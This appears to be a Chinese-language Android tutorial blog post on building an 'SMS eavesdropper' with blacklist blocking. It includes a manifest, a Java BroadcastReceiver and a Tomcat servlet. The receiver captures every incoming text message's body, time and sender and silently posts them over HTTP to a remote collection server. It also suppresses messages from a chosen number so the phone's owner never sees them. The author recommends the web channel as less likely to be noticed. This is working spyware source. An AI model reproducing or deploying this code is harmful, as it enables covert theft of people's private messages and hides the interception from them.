Android--短信窃听器及黑名单拦截
一、短信窃听器原理:
当系统收到短信时,会发出一个广播Intent,Intent的action名称为android.provider.Telephony.SMS_RECEIVED,该Intent存放了系统接收到的短信内容,
我们使用名称“pdus”既可以从Intent中户取到短信内容
二、获取窃听信息的方式有两种:
一种将窃听的短信以短信转发的方式将短信发送给窃听者,需要走短信通道,所以扣除用户的费用,容易被发现。
一种将窃听的短信息发送到web应用,因为走的是互联网络通道,所以无法查询访问了哪些网站,数据量较少,产生的流量费也不多,所以这种方式比较好。
这里选用第二种方式
三、广播分为两种不同的类型:“普通广播(Normal broadcast)和”有序广播(Ordered broadcast)
普通广播
完全异步的,可以在同一时刻(逻辑上)被所欲接收者接收到,相对有序广播消息传递的效率比较高,缺点:接收者不能将处理结果传递给下一个接收者,
并且无法终止广播Intent的传播。
有序广播
按照接收者声明的优先级别,被接收者依次接收广播。如:A的优先级高于B,B的优先级高于C,那么,广播先传给A,再传给B,最后传给C。优先级别在
<intent-filter>的android.priority属性中声明,数值越大优先级越高,取值范围:-1000到1000,优先级别也可以调用IntentFilter对象的setPrority()进行设置。
有序广播的接收者可以终止广播Intent的广播,广播Intent一旦终止,后面跟的接收者就无法接收到广播。另外,有序广播的接收者可以将数据传递给下一个
接收者,如:A得到广播后,可以往它的结果独享中存入数据,当广播传给B时,B可以从A的结果对象中得到A存入的数据。
四、发送两种广播方式的方法
Context.sendBroadcast()
发送的是普通广播,所有订阅者都有机会获得并进行处理
Context.sendOrderedBroadcast()
发送有序广播,系统会根据接收者声明的优先级别按顺序逐个执行接收者,前面的接收者有权终止广播。
对于有序广播,前面的接收者可以将数据通过setResultExtras(Bundle)方法存放进结果对象。然后传给下一个接收者,下一个接收者通
过代码:Bundle bundle = getResultExtras(true)可以获取上一个接收者存入在结果对象中的数据。
五、短信黑名单拦截的原理
系统受到短信,发出的广播属于有序广播。所以可以通过设置优先级,让自定义的接收者先获取到广播,然后终止广播,这样用户就接收不到短信了。
六、短信窃听器及黑名单拦截代码
演示过程:
开启两个Android模拟器,将该窃听器发布到一个模拟器5554上,用另外一个模拟器5556向5554发送信息,可以看到在控制台上打印了信息内容,时间,发送者等信息,而5554却没有任何响应,即没有收到信息
发现的错误:
在注册广播时,将intent-filter的配置在了<receiver>外面,以至于没有注册成功,无法启动SMSBroadcastReceiver,在服务端一直未获得数据。
AndroidMainfest.xml
进行广播接收注册,短信,网络访问权限以及意图匹配
在<intent-filter>的android.priority属性中进行优先级声明,这里为最大1000
<application android:label="@string/app_name"
android:icon="@drawable/ic_launcher"
android:theme="@style/AppTheme">
<receiver android:name = ".SMSBroadcastReceiver">
<!-- 意图过滤器 -->
<intent-filter android:priority="1000">
<action android:name="android.provider.Telephony.SMS_RECEIVED" />
</intent-filter>
</receiver>
</application>
<uses-permission android:name="android.permission.RECEIVE_SMS"/>
<uses-permission android:name="android.permission.INTERNET"/>
短信广播接收者
在本应用中不需要创建Activity,只需创建一个短信接收继承自广播接收者即可
在该类中提供了:
获取短信息以及其更具体信息的方法
由于我们要将信息发送到网络上,所以创建一个实现该功能的方法sendSMS2Web,该方法主要实现如何发送请求,以及请求的实体数据向服务器,以便获得服务
package cn.xushuai.smslistener;
import java.io.IOException;
import java.net.HttpURLConnection;
import java.net.MalformedURLException;
import java.net.URL;
import java.net.URLEncoder;
import java.text.SimpleDateFormat;
import java.util.Date;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.telephony.SmsMessage;
//接收短信的广播接收者
public class SMSBroadcastReceiver extends BroadcastReceiver {
@Override
public void onReceive(Context context, Intent intent) {
Object[] pdus = (Object[]) intent.getExtras().get("pdus");
for(Object obj : pdus){
byte[] pdu = (byte[]) obj;//将对象转换为字节数组
SmsMessage message = SmsMessage.createFromPdu(pdu);//使用pdu格式的数据生成短信对象
String content = message.getMessageBody();
Date date = new Date(message.getTimestampMillis());//获取发送时间
SimpleDateFormat format = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
String receiveTime = format.format(date);//获取指定格式发送日期
String senderNumber = message.getOriginatingAddress();//发送者的号码
System.out.println(receiveTime+".."+senderNumber);
//将数据发送到网络
sendSMS2Web(content,receiveTime,senderNumber);
if("15555215556".equals(senderNumber)){
abortBroadcast();
}
}
}
private boolean sendSMS2Web(String content, String receiveTime,String senderNumber){
try{
//构建实体数据
String params = "content="+URLEncoder.encode(content, "UTF-8")+
"&receivetime="+receiveTime+"&sendernumber="+senderNumber;
byte[] entity = params.getBytes();
String path = "http://10.1.8.153:8080/SMSServer/ReceiveSMSServlet";
HttpURLConnection conn = (HttpURLConnection) new URL(path).openConnection();
conn.setConnectTimeout(5000);
conn.setRequestMethod("POST");
conn.setDoOutput(true);//允许对外输出数据
conn.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");
conn.setRequestProperty("Content-Length", String.valueOf(entity.length));
conn.getOutputStream().write(entity);
if(conn.getResponseCode()==200){
return true;
}
}catch(Exception e){
e.printStackTrace();
}
return false;
}
}
服务器
使用tomcat服务器创建一个web服务器,并提供一个ReceiveSMSServlet来提供信息的处理,这里打印到控制台
package cn.xushuai.servlet;
import java.io.IOException;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
public class ReceiveSMSServlet extends HttpServlet {
private static final long serialVersionUID = 1L;
protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
doPost(request,response);
}
protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
String content = request.getParameter("content");
String receiveTime = request.getParameter("receivetime");
String senderNumber = request.getParameter("sendernumber");
System.out.println("短信内容:"+content);
System.out.println("接收时间:"+receiveTime);
System.out.println("短信发送者:"+senderNumber);
}
}